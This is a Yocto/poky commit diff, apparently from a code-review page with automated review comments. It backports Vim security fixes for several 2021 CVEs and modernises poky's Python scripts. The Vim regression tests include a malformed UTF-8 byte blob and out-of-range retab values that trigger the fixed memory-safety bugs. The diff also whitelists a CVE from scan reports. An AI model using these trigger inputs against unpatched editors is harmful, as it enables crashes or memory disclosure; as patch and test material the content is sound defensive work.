@@ -0,0 +1,61 @@ +From 6d351cec5b97cb72b226d03bd727e453a235ed8d Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Sun, 26 Sep 2021 23:48:00 +0000 +Subject: [PATCH] patch 8.2.3409: reading beyond end of line with invalid utf-8 + character + +Problem: Reading beyond end of line with invalid utf-8 character. +Solution: Check for NUL when advancing. + +Upstream-Status: Accepted [https://github.com/vim/vim/commit/65b605665997fad54ef39a93199e305af2fe4d7f] +CVE: CVE-2021-3778 +Signed-off-by: Minjae Kim <flowergom@gmail.com> + +--- + src/regexp_nfa.c | 3 ++- + src/testdir/test_regexp_utf8.vim | 7 +++++++ + src/version.c | 2 ++ + 3 files changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/regexp_nfa.c b/src/regexp_nfa.c +index fb512f961..ace83a1a3 100644 +--- a/src/regexp_nfa.c ++++ b/src/regexp_nfa.c +@@ -5455,7 +5455,8 @@ find_match_text(colnr_T startcol, int regstart, char_u *match_text) + match = FALSE; + break; + } +- len2 += MB_CHAR2LEN(c2); ++ len2 += enc_utf8 ? utf_ptr2len(rex.line + col + len2) ++ : MB_CHAR2LEN(c2); + } + if (match + // check that no composing char follows +diff --git a/src/testdir/test_regexp_utf8.vim b/src/testdir/test_regexp_utf8.vim +index 19ff882be..e0665818b 100644 +--- a/src/testdir/test_regexp_utf8.vim ++++ b/src/testdir/test_regexp_utf8.vim +@@ -215,3 +215,10 @@ func Test_optmatch_toolong() + set re=0 + endfunc + ++func Test_match_invalid_byte() ++ call writefile(0z630a.765d30aa0a.2e0a.790a.4030, 'Xinvalid') ++ new ++ source Xinvalid ++ bwipe! ++ call delete('Xinvalid') ++endfunc +diff --git a/src/version.c b/src/version.c +index 8912f6215..85bdfc601 100644 +--- a/src/version.c ++++ b/src/version.c +@@ -742,6 +742,8 @@ static char *(features[]) = + + static int included_patches[] = + { /* Add new patch number below this line */ ++/**/ ++ 3409, + /**/ + 3402, + /**/ 
diff --git a/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch new file mode 100644 index 0000000000..6a67281907 --- /dev/null +++ b/poky/meta/recipes-support/vim/files/CVE-2021-4069.patch @@ -0,0 +1,43 @@ +From cd2422ee2dab3f33b2dbd1271e17cdaf8762b6d1 Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Fri, 17 Dec 2021 20:32:02 -0800 +Subject: [PATCH] using freed memory in open command + +Problem: Using freed memory in open command. +Solution: Make a copy of the current line. + +Upstream-Status: Backported [https://github.com/vim/vim/commit/e031fe90cf2e375ce861ff5e5e281e4ad229ebb9] +CVE: CVE-2021-4069 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + src/ex_docmd.c | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/src/ex_docmd.c b/src/ex_docmd.c +index 59e245bee..ccd9e8bed 100644 +--- a/src/ex_docmd.c ++++ b/src/ex_docmd.c +@@ -6029,13 +6029,17 @@ ex_open(exarg_T *eap) + regmatch.regprog = vim_regcomp(eap->arg, p_magic ? RE_MAGIC : 0); + if (regmatch.regprog != NULL) + { ++ // make a copy of the line, when searching for a mark it might be ++ // flushed ++ char_u *line = vim_strsave(ml_get_curline()); ++ + regmatch.rm_ic = p_ic; +- p = ml_get_curline(); +- if (vim_regexec(®match, p, (colnr_T)0)) +- curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - p); ++ if (vim_regexec(®match, line, (colnr_T)0)) ++ curwin->w_cursor.col = (colnr_T)(regmatch.startp[0] - line); + else + emsg(_(e_nomatch)); + vim_regfree(regmatch.regprog); ++ vim_free(line); + } + // Move to the NUL, ignore any other arguments. + eap->arg += STRLEN(eap->arg); +-- +2.25.1 + diff --git a/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch new file mode 100644 index 0000000000..1cee759502 --- /dev/null 
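Review bot: The copy made by `vim_strsave(ml_get_curline())` in the ex_open change is passed to vim_regexec() without a NULL check, so an allocation failure would hand a null line pointer to the regexp matcher. Guarding the call keeps that failure on the existing no-match path: `if (line != NULL && vim_regexec(&regmatch, line, (colnr_T)0))`. The closing `vim_free(line)` is expected to tolerate NULL, which is worth confirming. The `®match` shown on this page looks like a rendering artefact of `&regmatch`. ex_open's body starts and ends outside the embedded hunk, and because this is a backport the change is best raised upstream as well.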
+++ b/poky/meta/recipes-support/vim/files/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch 
@@ -0,0 +1,207 @@ +From b7081e135a16091c93f6f5f7525a5c58fb7ca9f9 Mon Sep 17 00:00:00 2001 +From: Bram Moolenaar <Bram@vim.org> +Date: Sat, 4 Sep 2021 18:47:28 +0200 +Subject: [PATCH] patch 8.2.3402: invalid memory access when using :retab with + large value + +Problem: Invalid memory access when using :retab with large value. +Solution: Check the number is positive. + +CVE: CVE-2021-3770 +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Upstream-Status: Backport [https://github.com/vim/vim/commit/b7081e135a16091c93f6f5f7525a5c58fb7ca9f9] +--- + src/indent.c | 34 +++++++++++++++++++++------------- + src/option.c | 12 ++++++------ + src/optionstr.c | 4 ++-- + src/testdir/test_retab.vim | 3 +++ + src/version.c | 2 ++ + 5 files changed, 34 insertions(+), 21 deletions(-) + +Index: git/src/indent.c +=================================================================== +--- git.orig/src/indent.c ++++ git/src/indent.c +@@ -18,18 +18,19 @@ + /* + * Set the integer values corresponding to the string setting of 'vartabstop'. + * "array" will be set, caller must free it if needed. ++ * Return FAIL for an error. 
+ */ + int + tabstop_set(char_u *var, int **array) + { +- int valcount = 1; +- int t; +- char_u *cp; ++ int valcount = 1; ++ int t; ++ char_u *cp; + + if (var[0] == NUL || (var[0] == '0' && var[1] == NUL)) + { + *array = NULL; +- return TRUE; ++ return OK; + } + + for (cp = var; *cp != NUL; ++cp) +@@ -43,8 +44,8 @@ tabstop_set(char_u *var, int **array) + if (cp != end) + emsg(_(e_positive)); + else +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), cp); ++ return FAIL; + } + } + +@@ -55,26 +56,33 @@ tabstop_set(char_u *var, int **array) + ++valcount; + continue; + } +- emsg(_(e_invarg)); +- return FALSE; ++ semsg(_(e_invarg2), var); ++ return FAIL; + } + + *array = ALLOC_MULT(int, valcount + 1); + if (*array == NULL) +- return FALSE; ++ return FAIL; + (*array)[0] = valcount; + + t = 1; + for (cp = var; *cp != NUL;) + { +- (*array)[t++] = atoi((char *)cp); +- while (*cp != NUL && *cp != ',') ++ int n = atoi((char *)cp); ++ ++ if (n < 0 || n > 9999) ++ { ++ semsg(_(e_invarg2), cp); ++ return FAIL; ++ } ++ (*array)[t++] = n; ++ while (*cp != NUL && *cp != ',') + ++cp; + if (*cp != NUL) + ++cp; + } + +- return TRUE; ++ return OK; + } + + /* +@@ -1556,7 +1564,7 @@ ex_retab(exarg_T *eap) + + #ifdef FEAT_VARTABS + new_ts_str = eap->arg; +- if (!tabstop_set(eap->arg, &new_vts_array)) ++ if (tabstop_set(eap->arg, &new_vts_array) == FAIL) + return; + while (vim_isdigit(*(eap->arg)) || *(eap->arg) == ',') + ++(eap->arg); +Index: git/src/option.c +=================================================================== +--- git.orig/src/option.c ++++ git/src/option.c +@@ -2292,9 +2292,9 @@ didset_options2(void) + #endif + #ifdef FEAT_VARTABS + vim_free(curbuf->b_p_vsts_array); +- tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); ++ (void)tabstop_set(curbuf->b_p_vsts, &curbuf->b_p_vsts_array); + vim_free(curbuf->b_p_vts_array); +- tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); ++ (void)tabstop_set(curbuf->b_p_vts, &curbuf->b_p_vts_array); + #endif + } + +@@ 
-5756,7 +5756,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vsts = vim_strsave(p_vsts); + COPY_OPT_SCTX(buf, BV_VSTS); + if (p_vsts && p_vsts != empty_option) +- tabstop_set(p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + buf->b_p_vsts_nopaste = p_vsts_nopaste +@@ -5914,7 +5914,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_isk = save_p_isk; + #ifdef FEAT_VARTABS + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -5929,7 +5929,7 @@ buf_copy_options(buf_T *buf, int flags) + buf->b_p_vts = vim_strsave(p_vts); + COPY_OPT_SCTX(buf, BV_VTS); + if (p_vts && p_vts != empty_option && !buf->b_p_vts_array) +- tabstop_set(p_vts, &buf->b_p_vts_array); ++ (void)tabstop_set(p_vts, &buf->b_p_vts_array); + else + buf->b_p_vts_array = NULL; + #endif +@@ -6634,7 +6634,7 @@ paste_option_changed(void) + if (buf->b_p_vsts_array) + vim_free(buf->b_p_vsts_array); + if (buf->b_p_vsts && buf->b_p_vsts != empty_option) +- tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); ++ (void)tabstop_set(buf->b_p_vsts, &buf->b_p_vsts_array); + else + buf->b_p_vsts_array = 0; + #endif +Index: git/src/optionstr.c +=================================================================== +--- git.orig/src/optionstr.c ++++ git/src/optionstr.c +@@ -2166,7 +2166,7 @@ did_set_string_option( + if (errmsg == NULL) + { + int *oldarray = curbuf->b_p_vsts_array; +- if (tabstop_set(*varp, &(curbuf->b_p_vsts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vsts_array)) == OK) + { + if (oldarray) + vim_free(oldarray); +@@ -2205,7 +2205,7 @@ did_set_string_option( + { + int *oldarray = curbuf->b_p_vts_array; + +- if (tabstop_set(*varp, &(curbuf->b_p_vts_array))) ++ if (tabstop_set(*varp, &(curbuf->b_p_vts_array)) == OK) + { + vim_free(oldarray); + #ifdef FEAT_FOLDING +Index: 
git/src/testdir/test_retab.vim +=================================================================== +--- git.orig/src/testdir/test_retab.vim ++++ git/src/testdir/test_retab.vim +@@ -74,4 +74,7 @@ endfunc + func Test_retab_error() + call assert_fails('retab -1', 'E487:') + call assert_fails('retab! -1', 'E487:') ++ call assert_fails('ret -1000', 'E487:') ++ call assert_fails('ret 10000', 'E475:') ++ call assert_fails('ret 80000000000000000000', 'E475:') + endfunc +Index: git/src/version.c +=================================================================== +--- git.orig/src/version.c ++++ git/src/version.c +@@ -743,6 +743,8 @@ static char *(features[]) = + static int included_patches[] = + { /* Add new patch number below this line */ + /**/ ++ 3402, ++/**/ + 0 + }; + diff --git a/poky/meta/recipes-support/vim/vim.inc b/poky/meta/recipes-support/vim/vim.inc index 878d0f18ae..51a6861325 100644 --- a/poky/meta/recipes-support/vim/vim.inc +++ b/poky/meta/recipes-support/vim/vim.inc 
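Review bot: In tabstop_set(), the new range check `if (n < 0 || n > 9999)` returns FAIL after `*array = ALLOC_MULT(int, valcount + 1)` has already been assigned, so the caller is left holding a partly filled array whose first element still claims `valcount` entries. The option.c call sites in this same patch discard the result with `(void)`, so nothing visible on those paths releases or resets the pointer. Releasing it before the early return closes that gap: `vim_free(*array); *array = NULL;` ahead of `return FAIL;`. It is worth checking whether upstream carries a follow-up for this that should be backported together with this patch.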
@@ -11,18 +11,32 @@ RSUGGESTS_${PN} = "diffutils" LICENSE = "vim" LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a" -SRC_URI = "git://github.com/vim/vim.git \ +SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \ file://disable_acl_header_check.patch \ file://vim-add-knob-whether-elf.h-are-checked.patch \ file://0001-src-Makefile-improve-reproducibility.patch \ file://no-path-adjust.patch \ file://racefix.patch \ -" + file://b7081e135a16091c93f6f5f7525a5c58fb7ca9f9.patch \ + file://CVE-2021-3778.patch \ + file://0002-patch-8.2.3428-using-freed-memory-when-replacing.patch \ + file://0003-patch-8.2.3487-illegal-memory-access-if-buffer-name-.patch \ + file://0004-patch-8.2.3489-ml_get-error-after-search-with-range.patch \ + file://0005-patch-8.2.3564-invalid-memory-access-when-scrolling-.patch \ + file://0001-patch-8.2.3581-reading-character-past-end-of-line.patch \ + file://0002-patch-8.2.3582-reading-uninitialized-memory-when-giv.patch \ + file://0002-patch-8.2.3611-crash-when-using-CTRL-W-f-without-fin.patch \ + file://CVE-2021-4069.patch \ + " + SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44" # Do not consider .z in x.y.z, as that is updated with every commit UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0" +# CVE-2021-3968 is related to an issue which was introduced after 8.2, this can be removed after 8.3. +CVE_CHECK_WHITELIST += "CVE-2021-3968" + S = "${WORKDIR}/git" VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}" @@ -54,11 +68,12 @@ do_compile() { autotools_do_compile } -#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny +#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny selinux, elfutils, nls PACKAGECONFIG ??= "" PACKAGECONFIG += " \ ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ + nls \ " PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" 
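Review bot: The comment above `CVE_CHECK_WHITELIST += "CVE-2021-3968"` does not say which upstream change introduced the issue, so the claim that the pinned SRCREV is unaffected cannot be checked from the recipe, and the entry hides the CVE from cve-check reports for as long as it stays. Naming the introducing patch would make it verifiable, e.g. `# CVE-2021-3968: affected code added by upstream patch <PATCH-NUMBER> (placeholder), later than SRCREV; remove when upgrading past it.` In the same hunk the ten new `file://` entries mix three naming schemes (numbered, `CVE-…`, bare commit hash) and reuse the `0002-` prefix three times. The list order is what fixes the application order, and the embedded version.c hunks depend on it, so a one-line comment saying so would help the next person who adds a patch.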
@@ -67,6 +82,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt," PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," +PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,," EXTRA_OECONF = " \ --disable-gpm \ diff --git a/poky/scripts/buildhistory-diff b/poky/scripts/buildhistory-diff index 833f7c33a5..02eedafd6e 100755 --- a/poky/scripts/buildhistory-diff +++ b/poky/scripts/buildhistory-diff @@ -11,7 +11,6 @@ import sys import os import argparse -from distutils.version import LooseVersion # Ensure PythonGit is installed (buildhistory_analysis needs it) try: @@ -71,10 +70,6 @@ def main(): parser = get_args_parser() args = parser.parse_args() - if LooseVersion(git.__version__) < '0.3.1': - sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n") - sys.exit(1) - if len(args.revisions) > 2: sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:])) parser.print_help() diff --git a/poky/scripts/contrib/convert-srcuri.py b/poky/scripts/contrib/convert-srcuri.py new file mode 100755 index 0000000000..5b362ea2e8 --- /dev/null +++ b/poky/scripts/contrib/convert-srcuri.py 
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+#
+# Conversion script to update SRC_URI to add branch to git urls
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import re
+import os
+import sys
+import tempfile
+import shutil
+import mimetypes
+
+if len(sys.argv) < 2:
+ print("Please specify a directory to run the conversion script against.")
+ sys.exit(1)
+
+def processfile(fn):
+ def matchline(line):
+ if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
+ return False
+ return True
+ print("processing file '%s'" % fn)
+ try:
+ if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
+ return
+ fh, abs_path = tempfile.mkstemp()
+ modified = False
+ with os.fdopen(fh, 'w') as new_file:
+ with open(fn, "r") as old_file:
+ for line in old_file:
+ if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
+ if line.endswith('"\n'):
+ line = line.replace('"\n', ';branch=master"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';branch=master \\\n')
+ modified = True
+ if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
+ if "protocol=git" in line:
+ line = line.replace('protocol=git', 'protocol=https')
+ elif line.endswith('"\n'):
+ line = line.replace('"\n', ';protocol=https"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';protocol=https \\\n')
+ modified = True
+ new_file.write(line)
+ if modified:
+ shutil.copymode(fn, abs_path)
+ os.remove(fn)
+ shutil.move(abs_path, fn)
+ except UnicodeDecodeError:
+ pass
+
+ourname = os.path.basename(sys.argv[0])
+ourversion = "0.1"
+
+if os.path.isfile(sys.argv[1]):
+ processfile(sys.argv[1])
+ sys.exit(0)
+
+for targetdir in sys.argv[1:]:
+ print("processing directory '%s'" % targetdir)
+ for root, dirs, files in os.walk(targetdir):
+ for name in files:
+ if name == ourname:
+ continue
+ fn = os.path.join(root, name)
+ if 
os.path.islink(fn): + continue + if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"): + continue + processfile(fn) + +print("All files processed with version %s" % ourversion) diff --git a/poky/scripts/lib/checklayer/cases/common.py b/poky/scripts/lib/checklayer/cases/common.py index b82304e361..4495f71b24 100644 --- a/poky/scripts/lib/checklayer/cases/common.py +++ b/poky/scripts/lib/checklayer/cases/common.py @@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase): # The top-level README file may have a suffix (like README.rst or README.txt). readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*')) self.assertTrue(len(readme_files) > 0, - msg="Layer doesn't contains README file.") + msg="Layer doesn't contain a README file.") # There might be more than one file matching the file pattern above # (for example, README.rst and README-COPYING.rst). The one with the shortest diff --git a/poky/scripts/lib/recipetool/create.py b/poky/scripts/lib/recipetool/create.py index 566c75369a..5b6ac12a92 100644 --- a/poky/scripts/lib/recipetool/create.py +++ b/poky/scripts/lib/recipetool/create.py @@ -478,6 +478,9 @@ def create_recipe(args): storeTagName = params['tag'] params['nobranch'] = '1' del params['tag'] + # Assume 'master' branch if not set + if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params: + params['branch'] = 'master' fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params)) tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR') 
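Review bot: processfile() in the new convert-srcuri.py leaves the file created by `tempfile.mkstemp()` behind whenever the input needs no change or raises UnicodeDecodeError, because `abs_path` is only consumed inside `if modified:`. A run over a layer therefore leaves one stray temp file per scanned file. The swap is also not atomic: `os.remove(fn)` runs before `shutil.move(abs_path, fn)`, and the temp file sits in the default temp directory, so an interruption or a failed cross-filesystem move can lose the recipe. Creating the temp file beside the target, swapping it in with `os.replace` and cleaning up in a `finally` closes both gaps. The `re` and `mimetypes` imports are unused in the lines shown.

```python
def processfile(fn):
    # … unchanged: matchline helper, progress message, skip-list check …
    # Temp file beside the target so the final swap stays on one filesystem.
    fh, abs_path = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(fn)))
    try:
        # … unchanged: copy fn into the temp file, rewriting SRC_URI lines …
        if modified:
            shutil.copymode(fn, abs_path)
            os.replace(abs_path, fn)
    except UnicodeDecodeError:
        pass
    finally:
        # After a successful os.replace the temp path is already gone.
        if os.path.exists(abs_path):
            os.remove(abs_path)
```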
@@ -527,10 +530,9 @@ def create_recipe(args): # Remove HEAD reference point and drop remote prefix get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')] if 'master' in get_branch: - # If it is master, we do not need to append 'branch=master' as this is default. # Even with the case where get_branch has multiple objects, if 'master' is one # of them, we should default take from 'master' - srcbranch = '' + srcbranch = 'master' elif len(get_branch) == 1: # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch' srcbranch = get_branch[0] @@ -543,8 +545,8 @@ def create_recipe(args): # Since we might have a value in srcbranch, we need to # recontruct the srcuri to include 'branch' in params. scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri) - if srcbranch: - params['branch'] = srcbranch + if scheme in ['git', 'gitsm']: + params['branch'] = srcbranch or 'master' if storeTagName and scheme in ['git', 'gitsm']: # Check srcrev using tag and check validity of the tag @@ -603,7 +605,7 @@ def create_recipe(args): splitline = line.split() if len(splitline) > 1: if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]): - srcuri = reformat_git_uri(splitline[1]) + srcuri = reformat_git_uri(splitline[1]) + ';branch=master' srcsubdir = 'git' break diff --git a/poky/scripts/lib/scriptutils.py b/poky/scripts/lib/scriptutils.py index f92255d8dc..47a08194d0 100644 --- a/poky/scripts/lib/scriptutils.py +++ b/poky/scripts/lib/scriptutils.py @@ -18,7 +18,8 @@ import sys import tempfile import threading import importlib -from importlib import machinery +import importlib.machinery +import importlib.util class KeepAliveStreamHandler(logging.StreamHandler): def __init__(self, keepalive=True, **kwargs): 
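Review bot: In the `@@ -603,7 +605,7 @@` hunk of recipetool/create.py, `;branch=master` is appended to whatever `reformat_git_uri()` returns, without the `'branch' not in params` and `'nobranch' not in params` checks that the `@@ -478,6 +478,9 @@` hunk applies. A local checkout whose origin is tracked on another branch would presumably produce a recipe pinned to `master`. String concatenation also assumes the returned URI carries no conflicting parameters; `reformat_git_uri` is not visible here, so that needs confirming. Routing this path through `bb.fetch2.decodeurl` and `bb.fetch2.encodeurl`, as the other two hunks do, would keep the branch handling consistent. create_recipe() starts and ends outside these hunks.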
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug('Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod def plugin_name(filename): return os.path.splitext(os.path.basename(filename))[0] @@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE'] for pathvar in pathvars: path = rd.getVar(pathvar) - shutil.rmtree(path) + if os.path.exists(path): + shutil.rmtree(path) finally: if fetchrecipe: try: diff --git a/poky/scripts/lib/wic/engine.py b/poky/scripts/lib/wic/engine.py index 9ff4394757..7dbde85696 100644 --- a/poky/scripts/lib/wic/engine.py +++ b/poky/scripts/lib/wic/engine.py @@ -19,10 +19,10 @@ import os import tempfile import json import subprocess +import shutil import re from collections import namedtuple, OrderedDict -from distutils.spawn import find_executable from wic import WicError from wic.filemap import sparse_copy @@ -245,7 +245,7 @@ class Disk: for path in pathlist.split(':'): self.paths = "%s%s:%s" % (native_sysroot, path, self.paths) - self.parted = find_executable("parted", self.paths) + self.parted = shutil.which("parted", path=self.paths) if not self.parted: raise WicError("Can't find executable parted") @@ -283,7 +283,7 @@ class Disk: "resize2fs", "mkswap", "mkdosfs", "debugfs"): aname = "_%s" % name if aname not in self.__dict__: - setattr(self, aname, find_executable(name, self.paths)) + setattr(self, aname, shutil.which(name, path=self.paths)) if aname not in self.__dict__ or self.__dict__[aname] is None: raise WicError("Can't find executable '{}'".format(name)) return self.__dict__[aname] diff --git a/poky/scripts/lib/wic/help.py b/poky/scripts/lib/wic/help.py index 62a2a90e79..fcace95ff4 100644 --- a/poky/scripts/lib/wic/help.py 
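Review bot: The replacement for `spec.loader.load_module()` in load_plugins() no longer registers the plugin in `sys.modules`, because `importlib.util.module_from_spec()` followed by `exec_module()` returns a module that only the caller references. Code that later looks the plugin up by name, or expects a second load to return the same object, would behave differently; if that matters, add `sys.modules[name] = mod` before `spec.loader.exec_module(mod)`. The same pattern appears in the `PluginMgr` hunk of wic/pluginbase.py, where the added `import types` also looks unused in the lines shown. Both functions continue outside their hunks.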
+++ b/poky/scripts/lib/wic/help.py @@ -840,8 +840,8 @@ DESCRIPTION meanings. The commands are based on the Fedora kickstart documentation but with modifications to reflect wic capabilities. - http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition - http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition + https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader Commands diff --git a/poky/scripts/lib/wic/misc.py b/poky/scripts/lib/wic/misc.py index 8fb508dd39..3e11822996 100644 --- a/poky/scripts/lib/wic/misc.py +++ b/poky/scripts/lib/wic/misc.py @@ -16,9 +16,9 @@ import logging import os import re import subprocess +import shutil from collections import defaultdict -from distutils import spawn from wic import WicError @@ -46,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools", "parted": "parted", "sfdisk": "util-linux", "sgdisk": "gptfdisk", - "syslinux": "syslinux" + "syslinux": "syslinux", + "tar": "tar" } def runtool(cmdln_or_args): @@ -113,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False): """ return _exec_cmd(cmd_and_args, as_shell)[1] +def find_executable(cmd, paths): + recipe = cmd + if recipe in NATIVE_RECIPES: + recipe = NATIVE_RECIPES[recipe] + provided = get_bitbake_var("ASSUME_PROVIDED") + if provided and "%s-native" % recipe in provided: + return True + + return shutil.which(cmd, path=paths) def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): """ @@ -141,7 +151,7 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): logger.debug("exec_native_cmd: %s", native_cmd_and_args) # If the command isn't in the native sysroot say we failed. - if spawn.find_executable(args[0], native_paths): + if find_executable(args[0], native_paths): ret, out = _exec_cmd(native_cmd_and_args, True) else: ret = 127 diff --git a/poky/scripts/lib/wic/partition.py b/poky/scripts/lib/wic/partition.py index 85f9847047..792bb3dcd3 100644 
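Review bot: The new find_executable() in wic/misc.py tests `"%s-native" % recipe in provided` against the raw ASSUME_PROVIDED string, which is a substring match. An entry that merely ends in `tar-native` would therefore satisfy the check for `tar`, whereas `if provided and "%s-native" % recipe in provided.split():` compares whole entries. That branch returns `True`, while the other returns a path or `None` from `shutil.which`; this works for the truthiness test in exec_native_cmd() but would mislead a caller expecting a path. When the ASSUME_PROVIDED branch is taken, nothing in the hunk confirms the tool is present before the command is handed to `_exec_cmd(native_cmd_and_args, True)`. A short docstring stating that contract would help.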
--- a/poky/scripts/lib/wic/partition.py +++ b/poky/scripts/lib/wic/partition.py @@ -104,7 +104,7 @@ class Partition(): extra_blocks = self.extra_space rootfs_size = actual_rootfs_size + extra_blocks - rootfs_size *= self.overhead_factor + rootfs_size = int(rootfs_size * self.overhead_factor) logger.debug("Added %d extra blocks to %s to get to %d total blocks", extra_blocks, self.mountpoint, rootfs_size) diff --git a/poky/scripts/lib/wic/pluginbase.py b/poky/scripts/lib/wic/pluginbase.py index d9b4e57747..b64568339b 100644 --- a/poky/scripts/lib/wic/pluginbase.py +++ b/poky/scripts/lib/wic/pluginbase.py @@ -9,9 +9,11 @@ __all__ = ['ImagerPlugin', 'SourcePlugin'] import os import logging +import types from collections import defaultdict -from importlib.machinery import SourceFileLoader +import importlib +import importlib.util from wic import WicError from wic.misc import get_bitbake_var @@ -54,7 +56,9 @@ class PluginMgr: mname = fname[:-3] mpath = os.path.join(ppath, fname) logger.debug("loading plugin module %s", mpath) - SourceFileLoader(mname, mpath).load_module() + spec = importlib.util.spec_from_file_location(mname, mpath) + module = importlib.util.module_from_spec(spec) + spec.loader.exec_module(module) return PLUGINS.get(ptype) diff --git a/poky/scripts/lib/wic/plugins/imager/direct.py b/poky/scripts/lib/wic/plugins/imager/direct.py index 7e1c1c03ab..2505c13fce 100644 --- a/poky/scripts/lib/wic/plugins/imager/direct.py +++ b/poky/scripts/lib/wic/plugins/imager/direct.py @@ -115,7 +115,7 @@ class DirectPlugin(ImagerPlugin): updated = False for part in self.parts: if not part.realnum or not part.mountpoint \ - or part.mountpoint == "/": + or part.mountpoint == "/" or not part.mountpoint.startswith('/'): continue if part.use_uuid: diff --git a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py b/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py index f2639e7004..32e47f1831 100644 --- a/poky/scripts/lib/wic/plugins/source/bootimg-pcbios.py 
